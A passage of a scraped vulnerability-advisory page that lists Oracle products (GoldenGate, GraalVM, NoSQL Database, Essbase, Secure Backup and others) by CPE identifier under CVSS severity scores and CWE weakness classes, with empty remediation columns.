fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:19.1.0.0.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
9.1 (Critical)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_security
oracle
|
cpe:2.3:a:oracle:database_-_security:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:prior_to_24.9:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:19.1.0.0.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
9.1 (Critical)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_security
oracle
|
cpe:2.3:a:oracle:database_-_security:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:prior_to_24.9:*:*:*:*:*:*:*
|
— |
CWE-1333
- Inefficient Regular Expression Complexity
6.5 (Medium)
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.6:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:19.3-19.24:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:21.3-21.15:*:*:*:*:*:*:*
|
— |
CWE-400
- Uncontrolled Resource Consumption
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
CWE-835
- Loop with Unreachable Exit Condition ('Infinite Loop')
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
CWE-20
- Improper Input Validation
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
CWE-787
- Out-of-bounds Write
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
4.3 (Medium)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:21.3-21.15:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:19.3-19.24:*:*:*:*:*:*:*
|
— |
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_xml_database
oracle
|
cpe:2.3:a:oracle:database_-_xml_database:21.3-21.15:*:*:*:*:*:*:*
|
— | |
|
database_-_xml_database
oracle
|
cpe:2.3:a:oracle:database_-_xml_database:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
database_-_xml_database
oracle
|
cpe:2.3:a:oracle:database_-_xml_database:19.3-19.24:*:*:*:*:*:*:*
|
— |
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_java_vm
oracle
|
cpe:2.3:a:oracle:database_-_java_vm:21.3-21.15:*:*:*:*:*:*:*
|
— | |
|
database_-_java_vm
oracle
|
cpe:2.3:a:oracle:database_-_java_vm:19.3-19.24:*:*:*:*:*:*:*
|
— | |
|
database_-_java_vm
oracle
|
cpe:2.3:a:oracle:database_-_java_vm:23.4-23.5:*:*:*:*:*:*:*
|
— |
4.9 (Medium)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
oracle_application_express
oracle_corporation
|
cpe:2.3:a:oracle_corporation:oracle_application_express:24.1:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:24.1:*:*:*:*:*:*:*
|
— |
7.1 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
8.1 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
26 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
8.1 (High)
Affected products
Known affected
17 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:21.3-21.14.0.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:19.1.0.0.0-19.1.0.0.18:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.6:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
5.3 (Medium)
Affected products
Known affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
CWE-476
- NULL Pointer Dereference
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
8.1 (High)
Affected products
Known affected
28 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
